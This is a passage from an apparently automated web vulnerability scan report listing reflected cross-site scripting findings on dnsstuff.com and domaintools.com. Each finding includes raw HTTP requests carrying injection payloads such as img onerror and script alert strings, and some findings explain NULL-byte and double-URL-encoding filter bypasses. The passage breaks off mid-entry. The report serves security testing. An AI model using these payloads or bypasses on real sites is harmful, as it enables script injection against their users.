<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<script type="text/java
...[SNIP]...
<a id="emailResultsLinkNoJS" href="http://www.dnsstuff.com/tools/ipall?tool_id=67dca4b\"><img src=a onerror=alert(1)>cbe6d23089b&token=&toolhandler_redirect=0&ip=209.235.10.84&quot;=&gt;=&lt;img_src=a onerror=alert(1)&gt;cbe6d23089b=">
...[SNIP]...

3.97. http://www.dnsstuff.com/tools/ipall/ [toolhandler_redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dnsstuff.com
Path:   /tools/ipall/

Issue detail

The value of the toolhandler_redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8abba"><img%20src%3da%20onerror%3dalert(1)>d7e87e019ab was submitted in the toolhandler_redirect parameter. This input was echoed as 8abba\"><img src=a onerror=alert(1)>d7e87e019ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tools/ipall/?tool_id=67&token=&toolhandler_redirect=08abba"><img%20src%3da%20onerror%3dalert(1)>d7e87e019ab&ip=209.235.10.84 HTTP/1.1
Host: www.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.1.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:04:18 GMT
Server: Apache/2.2.16 (Unix) DAV/2 mod_ssl/2.2.16 OpenSSL/0.9.8e
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 18 Jul 2011 02:04:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14033
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<script type="text/java
...[SNIP]...
<a id="emailResultsLinkNoJS" href="http://www.dnsstuff.com/tools/ipall?tool_id=67&token=&toolhandler_redirect=08abba\"><img src=a onerror=alert(1)>d7e87e019ab&ip=209.235.10.84&quot;=&gt;=&lt;img_src=a onerror=alert(1)&gt;d7e87e019ab=">
...[SNIP]...

3.98. http://www.dnsstuff.com/tools/ipall/a [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.dnsstuff.com
Path:   /tools/ipall/a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006db6b"><a>5598c7bc19e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6db6b\"><a>5598c7bc19e in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /tools/ipall/a?%006db6b"><a>5598c7bc19e=1 HTTP/1.1
Host: www.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67dca4b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3Ecbe6d23089b&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.3.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; guid=629fad8433489d10f91fe22b85337a2c; ID=f3d6c1ad003861

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:10:13 GMT
Server: Apache/2.2.16 (Unix) DAV/2 mod_ssl/2.2.16 OpenSSL/0.9.8e
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 18 Jul 2011 02:10:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 13835
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<script type="text/java
...[SNIP]...
<a id="emailResultsLinkNoJS" href="http://www.dnsstuff.com/tools/ipall?%006db6b\"><a>5598c7bc19e=1&quot;=&gt;=&lt;a=&gt;5598c7bc19e=1">
...[SNIP]...

3.99. http://www.dnsstuff.com/tools/ipall/a/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dnsstuff.com
Path:   /tools/ipall/a/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5380%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5b9d6639a3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a5380\"><script>alert(1)</script>5b9d6639a3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /tools/ipall/a/?a5380%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5b9d6639a3e=1 HTTP/1.1
Host: www.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67dca4b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3Ecbe6d23089b&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.3.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; guid=629fad8433489d10f91fe22b85337a2c; ID=f3d6c1ad003861

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:07:24 GMT
Server: Apache/2.2.16 (Unix) DAV/2 mod_ssl/2.2.16 OpenSSL/0.9.8e
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 18 Jul 2011 02:07:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 13931
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<script type="text/java
...[SNIP]...
<a id="emailResultsLinkNoJS" href="http://www.dnsstuff.com/tools/ipall?a5380%22%3e%3cscript%3ealert%281%29%3c%2fscript%3e5b9d6639a3e=1&a5380\"><script>alert(1)</script>5b9d6639a3e=1">
...[SNIP]...

3.100. http://www.domaintools.com/about/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cc6d7<a>724f95e7d81 was submitted in REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /aboutcc6d7<a>724f95e7d81/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:12:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:12:11 GMT
Content-Length: 12048
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>724f95e7d81">Whois record for "aboutcc6d7<a>724f95e7d81"</a>
...[SNIP]...

3.101. http://www.domaintools.com/about/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7bd0"><a>4b1c7fd1561 was submitted in REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /aboutf7bd0"><a>4b1c7fd1561/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:12:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:12:02 GMT
Content-Length: 12069
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=aboutf7bd0"><a>4b1c7fd1561">
...[SNIP]...

3.102. http://www.domaintools.com/about/big-changes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/big-changes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1481f<a>167fa243eba was submitted in REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/big-changes1481f<a>167fa243eba/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:12:24 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:12:25 GMT
Content-Length: 12104
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>167fa243eba">Whois record for "big-changes1481f<a>167fa243eba"</a>
...[SNIP]...

3.103. http://www.domaintools.com/about/big-changes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/big-changes/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65cb0"><a>c15207160e9 was submitted in REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/big-changes65cb0"><a>c15207160e9/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:12:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:12:14 GMT
Content-Length: 12125
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=big-changes65cb0"><a>c15207160e9">
...[SNIP]...

3.104. http://www.domaintools.com/about/contact-us/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/contact-us/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b40c8<a>b49c022f80c was submitted in REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/contact-usb40c8<a>b49c022f80c/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:12:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:12:44 GMT
Content-Length: 12096
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>b49c022f80c">Whois record for "contact-usb40c8<a>b49c022f80c"</a>
...[SNIP]...

3.105. http://www.domaintools.com/about/contact-us/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/contact-us/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90a4b"><a>beacf8fc08f was submitted in REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/contact-us90a4b"><a>beacf8fc08f/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:12:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:12:32 GMT
Content-Length: 12117
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=contact-us90a4b"><a>beacf8fc08f">
...[SNIP]...

3.106. http://www.domaintools.com/about/features-and-pricing/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/features-and-pricing/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 238fa"><a>f3530ad6c99 was submitted in REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/features-and-pricing238fa"><a>f3530ad6c99/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:12 GMT
Content-Length: 12179
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=features-and-pricing238fa"><a>f3530ad6c99">
...[SNIP]...

3.107. http://www.domaintools.com/about/features-and-pricing/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/features-and-pricing/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 23c97<a>9273ea8bed3 was submitted in REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/23c97<a>9273ea8bed3/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:21 GMT
Content-Length: 12016
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>9273ea8bed3">Whois record for "23c97<a>9273ea8bed3"</a>
...[SNIP]...

3.108. http://www.domaintools.com/about/join-our-team/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/join-our-team/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5764"><a>00e59d41b90 was submitted in REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/join-our-teamc5764"><a>00e59d41b90/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:12:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:12:55 GMT
Content-Length: 12141
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=join-our-teamc5764"><a>00e59d41b90">
...[SNIP]...

3.109. http://www.domaintools.com/about/join-our-team/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/join-our-team/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5becf<a>884039f78e1 was submitted in REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/5becf<a>884039f78e1/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:07 GMT
Content-Length: 12016
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>884039f78e1">Whois record for "5becf<a>884039f78e1"</a>
...[SNIP]...

3.110. http://www.domaintools.com/about/learn-more/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/learn-more/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26e0d"><a>9bdccc00611 was submitted in REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/learn-more26e0d"><a>9bdccc00611/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:07 GMT
Content-Length: 12117
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=learn-more26e0d"><a>9bdccc00611">
...[SNIP]...

3.111. http://www.domaintools.com/about/learn-more/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/learn-more/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 372b9<a>a26dbc0dae9 was submitted in REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/learn-more372b9<a>a26dbc0dae9/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:17 GMT
Content-Length: 12096
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>a26dbc0dae9">Whois record for "learn-more372b9<a>a26dbc0dae9"</a>
...[SNIP]...

3.112. http://www.domaintools.com/about/privacy-policy/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/privacy-policy/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f78d9<a>252e4aac4cc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/f78d9<a>252e4aac4cc/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:19 GMT
Content-Length: 12016
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>252e4aac4cc">Whois record for "f78d9<a>252e4aac4cc"</a>
...[SNIP]...

3.113. http://www.domaintools.com/about/privacy-policy/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/privacy-policy/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef226"><a>8646b24e80f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

